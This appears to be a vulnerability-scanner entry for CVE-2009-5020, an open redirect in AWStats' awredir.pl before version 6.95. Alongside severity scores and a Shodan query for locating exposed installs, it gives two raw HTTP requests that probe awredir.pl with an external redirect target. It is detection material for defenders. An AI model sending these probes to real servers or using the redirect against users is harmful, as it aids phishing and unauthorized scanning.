| Title | AWStats < 6.95 - Open Redirect |
|---|---|
| Author | pdteam |
| Severity | Medium |
| Impact | Allows attackers to redirect users to malicious websites or phishing pages. |
| Remediation | Apply all relevant security patches and product upgrades. |
| CVSS Score | 5.8 |
| EPSS Score | 0.01473 |
| CVE ID | CVE-2009-5020 |
| CWE ID | CWE-20 |
| Shodan Query | cpe:"cpe:2.3:a:laurent_destailleur:awstats" |
| Tags | cve2009 cve redirect awstats vuln |
An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
GET /awstats/awredir.pl?url=interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-5020.yaml
🦈 Packet Capture: ⬇️ Download cve-2009-5020.pcap
N/AN/A